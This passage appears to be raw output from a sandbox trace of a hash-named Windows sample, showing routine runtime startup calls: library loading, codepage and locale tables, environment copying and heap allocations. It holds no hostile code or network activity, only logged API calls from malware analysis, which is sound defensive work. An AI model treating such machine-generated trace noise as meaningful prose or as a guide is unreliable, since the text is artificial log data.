/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x5b92e0*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0080.102] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0080.106] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.106] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0080.106] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.106] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0080.106] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0080.107] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.107] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0080.108] GetProcessHeap () returned 0x5b0000 [0080.108] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.109] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0080.110] GetLastError () returned 0x0 [0080.110] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0080.110] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0080.110] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c8) returned 0x5c5ab0 [0080.110] SetLastError (dwErrCode=0x0) [0080.110] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1200) returned 0x5c5e80 [0080.112] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0080.112] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0080.112] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.112] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW" [0080.112] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW" [0080.113] GetACP () returned 0x4e4 [0080.113] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x228) returned 0x5ba810 [0080.113] IsValidCodePage (CodePage=0x4e4) returned 1 [0080.113] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0080.113] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0080.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0080.113] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0080.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0080.113] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.113] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0080.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.114] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0080.114] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0080.114] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.114] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0080.114] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.114] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0080.114] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0080.114] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0080.114] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1000) returned 0x5c7090 [0080.115] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0080.115] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0080.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0080.115] AreFileApisANSI () returned 1 [0080.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0080.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0080.115] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc0) returned 0x5b43d0 [0080.115] GetEnvironmentStringsW () returned 0x5c80a0* [0080.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0080.115] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4e6) returned 0x5c8a80 [0080.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x5c8a80, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0080.115] FreeEnvironmentStringsW (penv=0x5c80a0) returned 1 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x118) returned 0x5b9800 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1f) returned 0x5bb4d0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5b9450 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x31) returned 0x5b4b10 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c06c0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x31) returned 0x5b4b50 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5b4060 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5bb530 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5b9780 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1d) returned 0x5bb590 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x31) returned 0x5b4b90 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5b4bd0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x17) returned 0x5b25e0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5b3e90 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x69) returned 0x5b3eb0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5c0b20 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1d) returned 0x5bb740 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c04e0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x12) returned 0x5b3f30 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x18) returned 0x5b3f50 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1b) returned 0x5bb5c0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1e) returned 0x5bb6e0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x29) returned 0x5bb9c0 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1e) returned 0x5bb830 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6b) returned 0x5bba00 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x17) returned 0x5bba80 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5b8870 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x16) returned 0x5b8890 [0080.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5c86f0 [0080.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x29) returned 0x5c85b0 [0080.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x12) returned 0x5c91c0 [0080.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x21) returned 0x5bb770 [0080.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x16) returned 0x5c9040 [0080.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x22) returned 0x5bb7a0 [0080.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x12) returned 0x5c91a0 [0080.117] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8a80 | out: hHeap=0x5b0000) returned 1 [0080.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa3a7) returned 0x5c9380 [0080.119] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5bb920 [0080.119] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa3a7) returned 0x5d3730 [0080.120] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.120] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfef7) returned 0x5ddae0 [0080.123] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5c0620 [0080.123] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfef7) returned 0x5ed9e0 [0080.124] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb920 | out: hHeap=0x5b0000) returned 1 [0080.124] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ddae0 | out: hHeap=0x5b0000) returned 1 [0080.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x450) returned 0x5c88b0 [0080.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x450) returned 0x5fd8e0 [0080.125] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1ea7) returned 0x5fdd40 [0080.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xf40) returned 0x5c9380 [0080.126] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a0) returned 0x5ca2d0 [0080.126] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fdd40 | out: hHeap=0x5b0000) returned 1 [0080.126] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.126] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xbf0) returned 0x5c9380 [0080.126] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.126] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca2d0 | out: hHeap=0x5b0000) returned 1 [0080.126] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x640) returned 0x5c88b0 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, 